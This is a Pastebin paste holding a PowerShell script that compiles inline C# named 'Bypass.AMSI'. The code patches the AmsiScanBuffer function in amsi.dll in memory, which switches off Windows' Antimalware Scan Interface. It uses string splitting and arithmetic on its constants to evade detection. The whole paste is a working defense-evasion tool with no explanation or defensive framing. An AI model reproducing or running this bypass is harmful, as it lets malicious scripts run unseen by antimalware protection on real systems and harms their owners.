Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $Assem = (
- "System, Version=4.0.0.0, Culture=neutral, PublickeyToken=b77a5c561934e089",
- "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublickeyToken=b03f5f7f11d50a3a"
- )
- $Source = @"
- using System;
- using System.Runtime.InteropServices;
- namespace Bypass
- {
- public class AMSI
- {
- [DllImport("kernel32")]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
- [DllImport("kernel32")]
- public static extern IntPtr LoadLibrary(string name);
- [DllImport("kernel32")]
- public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpfloldProtect);
- [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
- static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
- public static int Disable()
- {
- IntPtr TargetDLL = LoadLibrary("amsi.dll");
- IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
- UIntPtr dwSize = (UIntPtr)(10 + 10) - 10;
- uint Zero = (12 + 12) - 24;
- VirtualProtect(ASBPtr, dwSize, (64 + 64) - 64, out Zero);
- //Byte[] Patch = { 187, 82, 1, 6, 128, 190 };
- Byte[] Patch = new byte [6];
- Patch[0] = 187;
- Patch[1] = 82;
- Patch[2] = 1;
- Patch[3] = 6;
- Patch[4] = 128;
- Patch[5] = 190;
- IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
- Marshal.Copy(new byte[] { Patch[0],Patch[1],Patch[2],Patch[3],Patch[4],Patch[5]}, 0, unmanagedPointer, 6);
- MoveMemory(ASBPtr, unmanagedPointer, 6);
- return 0;
- }
- }
- }
- "@
- add-Type -ReferencedAssemblies $Assem -TypeDefinition $Source -Language CSharp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
